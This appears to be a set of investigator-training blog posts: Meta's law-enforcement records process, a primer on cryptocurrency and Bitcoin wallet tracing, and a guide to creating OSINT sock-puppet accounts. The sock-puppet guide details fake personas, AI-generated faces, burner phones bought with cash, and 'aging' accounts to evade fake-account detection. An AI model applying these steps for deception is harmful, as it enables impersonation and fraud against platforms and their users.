Meta Platforms, Inc. is the new name for the parent company for Facebook and Instagram. It is important to note that Meta Platforms, Inc. does not process legal preservation and records requests through email or fax. Instead, all such legal procedures must be channeled through thier dedicated Law Enforcement (LE) Portal available at: https://www.facebook.com/records. This portal serves as the central point for managing both urgent requests and all other legal formalities.

For law enforcement officials requesting records, choosing the option “CHILD EXPLOITATION – POTENTIAL HARM” ensures that the account holder is not alerted, and there is no need for a Non Disclosure Order.For detailed guidelines, the Meta Platforms LE Guide, which includes the address mentioned above, can be found here: https://about.meta.com/actions/safety/audiences/law/guidelines/.

Additionally, legal requests concerning Facebook and Instagram users within your jurisdiction should correctly identify Meta Platforms, Inc. as the service provider to ensure the requests are directed to the appropriate legal entity. Guidelines specific to law enforcement for Instagram can be accessed through: https://help.instagram.com/494561080557017/.

For queries regarding the legal process, Meta provides a dedicated contact for law enforcement officials only: evacher@meta.com.

Simplifying the Complex

For those in law enforcement and investigations, knowing how to navigate the legalities of accessing data from platforms like Facebook and Instagram is crucial. While the process may seem daunting, understanding the basics of what data can be accessed, how to legally obtain it, and why it’s important can demystify the task. This knowledge ensures that investigations can proceed effectively, respecting both the legal process and individual privacy rights.

Remember, this is a simplified overview designed to make the process as clear as possible for those without a technical background. The key is always to work closely with legal teams to ensure that all requests for data comply with the law, ensuring the integrity of the investigation and the privacy of all involved.

Resources:

Search.org
CSI Linux Academy
The CSI Linux Certified Social Media Investigator (CSIL-CSMI)
The CSI Linux Certified – OSINT Analyst (CSIL-COA)

Posted on March 19, 2024September 25, 2024 by Jeremy Martin

Understanding Cryptocurrencies: A Layman’s Guide

What Are Cryptocurrencies?

Imagine you have a virtual coin that exists on the internet. This coin is unique because it’s secure, and you can send it to anyone around the world without needing a bank. This is the essence of what a cryptocurrency is – a digital or virtual form of money that uses cryptography (a fancy word for secure communication) to make transactions safe and anonymous.

Essentially, they are strings of encrypted data representing units of currency, secured by cryptography. Unlike traditional currencies, they operate on a decentralized network of computers (nodes) without the need for a central authority.

The Magic Behind Cryptocurrencies: Ledgers

Now, how do we keep track of who owns what without a central authority like a bank? Here comes the concept of a ledger. Think of a ledger as a giant, digital notebook that records every transaction made with these virtual coins. Every time someone sends or receives cryptocurrency, that transaction gets added to the notebook.

Every cryptocurrency is a blockchain, a distributed ledger technology (DLT). A blockchain is a chain of blocks, where each block contains a number of transactions. Every time a cryptocurrency transaction occurs, it is broadcast to the network and, upon validation, added to a block. Once a block is filled with transactions, it is cryptographically sealed and linked to the previous block, forming a chain.

The ledger in the context of cryptocurrencies is a blockchain. This ledger records all transactions across a network of computers. Unlike traditional ledgers, blockchain is decentralized, meaning no single entity has control over the entire ledger. This decentralization ensures security and integrity, as altering any information would require overwhelming consensus from the network participants.

Public Ledgers: Everyone Can See, But Nobody Can Cheat

One might wonder, “Isn’t it risky to have all transaction records in a notebook that everyone can see?” Here’s the twist – although the ledger is public and anyone can view the transactions, the details of the people making those transactions are encrypted. Think of it as writing in a diary with a secret code that only you understand. This transparency helps ensure that everything is fair and that no one is cheating the system.

Blockchain ledgers are typically public. Transactions on the blockchain are visible to anyone who wishes to view them, yet the identities of the parties involved are protected through cryptographic techniques. Each user has a pair of keys: a public key, which is openly known and serves as an address to receive funds, and a private key, which is kept secret and used to sign transactions. This dual-key system ensures that while transactions are transparent, user identities remain confidential.

Making Transfers: A Peer-to-Peer Network

Transferring cryptocurrencies is like sending a secure email to someone. You simply choose how much to send, enter the recipient’s “address” (think of it as their email for cryptocurrency), and hit send. This transaction then gets verified by other users on the network (this process is called mining) and is added to the ledger. The beautiful part? There’s no middleman like a bank involved, making this process quick and relatively inexpensive.

Transferring cryptocurrency involves creating and signing a transaction with the sender’s private key and broadcasting it to the network. Miners or validators (depending on the consensus mechanism) then verify the transaction’s validity. This involves checking the digital signatures for authenticity and ensuring the sender has the necessary funds. Once verified, the transaction is added to a block, which is then added to the blockchain. This process typically takes minutes and bypasses traditional banking systems, offering a faster, more efficient method of transferring funds.

The Role of Consensus Mechanisms

A crucial aspect of cryptocurrencies is the consensus mechanism, a protocol that ensures all nodes in the network agree on the current state of the blockchain. The most common mechanisms are Proof of Work (PoW) and Proof of Stake (PoS). PoW, used by Bitcoin, involves miners solving complex mathematical puzzles to validate transactions and create new blocks. PoS, an energy-efficient alternative, selects validators in proportion to their quantity of holdings in the cryptocurrency to validate transactions and create blocks.

What is Bitcoin?

Imagine you have a digital coin that you can send to anyone over the internet. This coin is called Bitcoin, and it was the first of what we now call cryptocurrencies. Introduced in 2009 by an unknown person or group of people under the pseudonym Satoshi Nakamoto, Bitcoin offers a way to make transactions without going through banks.

How Does Bitcoin Work?

Bitcoin works on a peer-to-peer network, meaning that people can send and receive bitcoins directly without intermediaries. Every Bitcoin transaction is recorded in a public ledger called the blockchain. This ensures that you can’t spend bitcoins you don’t own, copies can’t be made, and transactions are secure.

Buying, Spending, and Mining

You can buy bitcoins through online exchanges or receive them as payment. Once you have bitcoins, you can spend them on a growing number of goods and services or save them as an investment. New bitcoins are created through a process called mining, where powerful computers solve complex math problems. When they solve the problem, they’re rewarded with new bitcoins. This process also secures the network and processes transactions.

Bitcoin and Blockchain Technology

At its core, Bitcoin is a collection of computers, or nodes, that all run Bitcoin’s code and store its blockchain. A blockchain can be thought of as a collection of blocks. In each block is a collection of transactions. Because all the computers running the blockchain have the same list of blocks and transactions and can transparently see these new blocks being filled with new Bitcoin transactions, no one can cheat the system.

Transactions and Security

Each Bitcoin transaction is broadcast to the network and ends up in blocks, where they are confirmed by miners through a process called Proof of Work (PoW). This process involves solving a computational puzzle that requires considerable processing power. The first miner to solve the puzzle adds the new block to the blockchain. This not only creates new bitcoins but also verifies and secures transactions, ensuring the integrity of the blockchain.

Decentralization and Consensus

Bitcoin’s decentralization means no single entity controls the network. It achieves consensus on the state of transactions and the blockchain through the mining process. This decentralized model protects Bitcoin from censorship and allows it to operate without a central authority.

The Significance of Bitcoin’s Design

Bitcoin’s design solves the “double spend” problem, ensuring that each bitcoin can only be spent once. This is achieved through the blockchain ledger, where every transaction is recorded. The ledger is public and verified by a vast amount of computing power, making Bitcoin a secure and transparent way to transfer value.

Bitcoin, blending technology and economics, has paved the way for the development of other cryptocurrencies and blockchain applications. Its inception marks a pivotal moment in the digital age, challenging traditional notions of currency and financial transactions. Whether viewed as an investment, a technology, or a social experiment, Bitcoin’s impact on the world continues to grow.

Understanding Bitcoin Wallet Investigations

When someone uses Bitcoin to make transactions, they use a digital wallet. This wallet doesn’t hold physical coins. Instead, it keeps a record of all transactions. Every transaction is public and recorded on the blockchain, which is like a giant ledger. This public record makes it possible to see where Bitcoins are transferred but doesn’t directly reveal the identity of the people involved.

Tracing Bitcoin Transactions

Imagine you’re trying to follow the trail of a specific Bitcoin as it moves from one wallet to another. Since every transaction is recorded, you can see when Bitcoins are transferred and split into different amounts. If someone sends Bitcoin to another person, a part of that Bitcoin might be returned as “change” to the sender, similar to getting change back when you pay with cash. By looking at these patterns, how the Bitcoins are split, and where they go, you can start to follow a trail.

The Challenge of Connecting Dots

The tricky part is linking these movements to real-world identities. Since the blockchain only shows the movement between digital addresses, it requires additional information to identify the person behind a transaction. This is where investigation techniques come in, using clues from transactions and sometimes combining them with external data to piece together who might own a particular wallet.

Digital Forensic Analysis of Bitcoin Wallets

In a more technical sense, investigating Bitcoin wallets involves examining the blockchain for transaction patterns, wallet addresses, and the flow of bitcoins. Sophisticated software tools can analyze the blockchain to trace transactions back to their source or through the multiple addresses they may pass through.

Understanding Change Addresses

A key concept in Bitcoin transactions is the change address. When someone sends a portion of their Bitcoin balance, the unspent portion is returned to a new address in their wallet, known as a change address. This is akin to receiving change when you pay with cash, but instead of going back to the same pocket, it goes into a new one. Investigators can look for patterns where funds are split between spending and change addresses to track how bitcoins are moved and consolidated.

Linking Transactions to Identities

While Bitcoin transactions themselves are pseudonymous, other information can sometimes link transactions to real identities. For example, if a Bitcoin address is shared on a public forum with identifiable information, or if Bitcoins are transferred to an exchange that implements Know Your Customer (KYC) policies, these data points can be used to identify the person behind the transactions.

Advanced Tracing Techniques

Tracing bitcoins back to the same user involves analyzing the blockchain for patterns where bitcoins are split and then reconsolidated, indicating control by the same entity. Techniques like cluster analysis group together addresses based on transaction behavior, which, combined with external data (such as IP addresses or KYC information from exchanges), can reveal the identity of a wallet’s owner.

Investigating Bitcoin wallets and tracing transactions is a complex blend of blockchain analysis, pattern recognition, and detective work. While the public nature of the blockchain provides a transparent record of transactions, the pseudonymous identities challenge direct attribution. However, through careful analysis and sometimes additional external information, it is possible to uncover the flow of funds and potentially the parties involved.

Cryptocurrencies represent a groundbreaking integration of cryptography, computer science, and financial principles to create a secure, decentralized, and efficient form of digital currency. Through the innovative use of blockchain technology, public ledgers, and consensus mechanisms, they offer a transparent, secure way of conducting transactions without traditional financial intermediaries. As the technology matures and adoption grows, cryptocurrencies continue to redefine the financial landscape.

Resources

The CSI Linux Certified OSINT Analyst (CSIL-COA)
The CSI Linux Certified Dark Web Investigator (CSI-CDWI)

Posted on January 30, 2024September 25, 2024 by csilinux

Operation OShINT: Shake The Cobwebs

Posted on August 7, 2023September 25, 2024 by csilinux

Using Sock Puppet Accounts for OSINT

‘A sock puppet or sock puppet is an online identity used for purposes of deception. The term, a reference to the manipulation of a simple hand puppet made from a sock, originally referred to a false identity assumed by a member of an internet community who spoke to, or about, themselves while pretending to be another person.’ – Wikipedia

These fake social media accounts are used by both sides of the cyber game. You can find hackers, scammers, bots, and other cyber criminals on the dark side while journalists, penetration testers, and investigators are on the other. Like any decent tool, it can be used for both good and evil. Why would YOU want to create an undercover account? When investigating, it is always a good idea to separate your real identity from the initial investigation. You increase the likelihood of the target will get suspicious. You also run the risk of being identified and doxed, harassed, and in the absolute worst-case scenario, targeted for lethal retaliation. Depending on who the suspect is, you always need to take the appropriate countermeasures to protect your organization/agency, yourself, and even your family. Another thing to take into consideration is that many social media sites have Terms of Service (TOS) that specifically cover fake or investigation accounts. Organizations like Facebook are actively looking for these types of accounts, even if they are law enforcement, and banning them.

!!!DO NOT USE YOUR PERSONAL OR BUSINESS ACCOUNTS TO DO INVESTIGATIONS!!!

The Importance of Anonymity and Security

You should connect to a public WiFi access point and only use VPN or Tor as a last resort. The reasons are that VPNs and Tor are sometimes tracked, blocked, or marked as questionable by websites when creating an account. This means the likelihood you will be able to create the account without having a real phone number decreases drastically. Public WiFi tends to look a bit more “normal”.

More about Tor

I love Tor and always have. Tor is great at offering some of the best anonymity available and the best part is that it’s free. The mechanics of Onion routing is that you are essentially moving through several different proxy servers, and this minimizes trace evidence that can be used to tie the traffic back to its original source. You can easily set up a hidden service with a “.onion“ address. This allows us to communicate securely with other investigators, informants, or even suspects. The downside of using Tor is that it is commonly used by criminals and many of the websites we need to investigate may be blocking traffic from Tor or red flagging it. So, even though it offers a lot of benefits, Tor is not always good for Surface Web investigations.

VPN Value?

There has been a ton of advertising for Virtual Private Network (VPN) services that claim that they will protect your Internet traffic. This is only partly true and mostly false. A VPN is a Point-to-Point encrypted tunnel that allows one network to talk to another through an encrypted tunnel. Think of it this way. You are using a third-party VPN service; your traffic is very secure when connecting from your system to the third-party network. The traffic then routes from that server through their Internet connection. The other thousand people using the same service will also share that same gateway IP address. That sounds fine, right? Well, after you leave that service provider, your traffic is back on the Internet for everyone else to see. This means it is naturally less anonymous than Tor. The providers may also be watching everything you do in the name of “Marketing”. Free VPNs and cheaper ones are the biggest risks. The services that claim they DO NOT STORE LOGS are also usually lying or not telling you the whole truth. Within networking, there will always be logs. They are required to troubleshoot when things fail. Logs will be there; it is just a matter of how long and how they are destroyed. Some of the websites are red-flagging the popular VPN services.

Creating a persona

Some people make these accounts from scratch. The more content and backstory you create in the beginning gives you more of direction to make the account look like a real person’s account. Use a password manager to keep track of everything you are creating for these accounts including the user/pass info and keep notes. KeePassXC is a great free solution that is cross-platform that will allow you to share your password management database among multiple computers and different operating systems.

Character/Persona generators

Creating an account can take some time, effort, and creativity. If you are short on any of those for whatever reason. Anyone that has played role-playing games like D&D, WARHAMMER, or other games where you need to generate a character to play, has a step up because they have done this before. There are a few resources you can leverage to help speed up the process and spit out a “character” with a lot of random attributes and content. Below is a list of resources you can use when generating your Sock Puppet persona. Just remember that all information generated is fake. You can change the data to fit your narrative:

Fake Identity Generator (fakepersongenerator.com)
Random Name Generator (www.elfqrin.com/fakeid.php)
Random Character Generator (random-character.com)
Personality Generator (rangen.co.uk)
Trait Generator (rangen.co.uk)

Image generators

Generating images that have consistency to them can be a challenge. You want to create a realistic person with history and consistency. It is important to NEVER use pictures of friends or family. This can put the investigation at risk and possibly them at risk as well.

(thispersondoesnotexist.com) – GitHub project available
AI-Generated Faces (boredhumans.com)
Gallery of AI-Generated Faces (generated.photos)

Emails

Creating an email is the base for setting up your undercover investigation account. This will be used for setting up social media accounts and communications with suspects. Any email service will work. Here are a few:

GMX.com
Mail.com
Protonmail.com
Yandex.Mail

Burner Phones

A burner phone is extremely useful and may be required to create accounts on certain websites along with creating a history for the persona. The reason is the sites are trying to prevent fake accounts from being created and will send an SMS validation message to a phone. Bots rarely have their own phone numbers. In some countries, you do not need to tie your ID or Passport to buy a SIM card or burner phone. If you are in one of these countries, it is suggested to use cash only and let the phone sit for 2+ months before you activate it with a sock puppet email. Sometimes SIM cards can also be purchased on Amazon.com. Keep an eye out for deals and trial offers. Phone emulators can also work.

VoIP Phone

Generate a Voice over IP (VoIP) account with an online vendor. This will be useful to add another layer of separation. Many online services like Google Voice require you to have a real phone number to tie to your account. This makes your burner phone that much more important.

Pre-Paid Credit Cards and Gift Cards

In some cases, you may need to use a credit/debit card for purchases, account setups, and account verifications. If you are in a country or area that allows you to purchase these types of cards (VISA/Mastercard), use good OPSEC to minimize links back. You can also use a privacy.com masked credit card.

Cryptocurrencies

If your investigation requires cryptocurrencies for transactions, you can use prepaid cards on most of the crypto services. Exodus.com is a wallet that allows you to trade many different currencies and their Desktop software is cross-platform compatible. An example of needing cryptocurrencies during an investigation may include fraud cases on sites like Facebook Marketplace, Instagram’s Shop Now, Craigslist, etc. You may also find them useful when purchasing content and buying services.

Social Media Accounts

When creating a social media account, you want to look as ‘normal’ as possible on the website because many of them are trying to stop people from creating fake accounts. Make sure you are not breaking the law or violating terms of service when doing this. Now things to look at when creating your OSINT undercover accounts:

Use public Wi-Fi and do NOT use a VPN
Pick a social media site to focus on
Use your persona’s “real” phone number for verification
Save the information in a password manager like KeePassXC
Keep Operational Security (OPSEC) in mind:
– Use a very strong password for the password manager access
– Use a different password for each account
– Never cross over accounts with your real-world or personal accounts
Go into the settings of the account you just created and change the phone number to a VoIP number
When you are done, log out of the account
Log back in and start adding information to your account relevant to the profiles
Go back to step 2 for the rest of the sites you want to try

Note: You may burn UC personals when creating accounts. Just be patient and persistent. This process takes time and effort.

Aging the Account

Like a fine wine or good whiskey, the account needs to be “aged”. This means creating content and history. This will minimize the likelihood of the account getting flagged as a fake by the service provider and deleted. Become the persona. Go to the same public WiFi you created the account with to log in and generate activity. Like posts, make comments, share things, and grow your connections. Log out when you are done. This is very important and ties into OPSEC. Not logging out can leak other networks and information out for Big Data if you are not careful. The goal is that you are training the site that you are a real person by doing real-person things. Try to add content and history following the personality of the fake character. This includes finding banners with image searches. Think of banners for your social media pages, memes, and pictures from the location your persona is from. Build your account pages how you believe your sock puppet would have. Add enough information to make it look real. Over time, keep logging into the account and add content to build history and the trustworthiness that the account is a “real” person.

Learn from your Investigations

‘Operations security (OPSEC) is a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence, determines if information obtained by adversaries could be interpreted to be useful to them, and then executes selected measures that eliminate or reduce adversary exploitation of friendly critical information.’ – Wikipedia

Things always change and you must keep improving to keep up. Make it a habit of using good OPSEC. There is a saying with investigators. The suspect needs to be lucky every single time, but you only need to be lucky once. The other side can use the same Tactics, Techniques, and Procedures (TTPs) as you do and that flips the table on you. Now, you need to be lucky every single time and they only need to be lucky once.

Resources

Creating Research Accounts for OSINT Investigations – We are OSINTCurio.us
Dark Side 116: Sock Puppets. What if I told you not all fake social media accounts are used maliciously?
DeBot: Twitter Bot Detection via Warped Correlation
How to Make Sock Puppet Accounts for OSINT in 2021 | Hacker Noon
The Art of The Sock (secjuice.com)
The Ultimate Sock Puppets Tutorial for OSINT Operators – Ehacking
Identifying Sock puppet Accounts on social media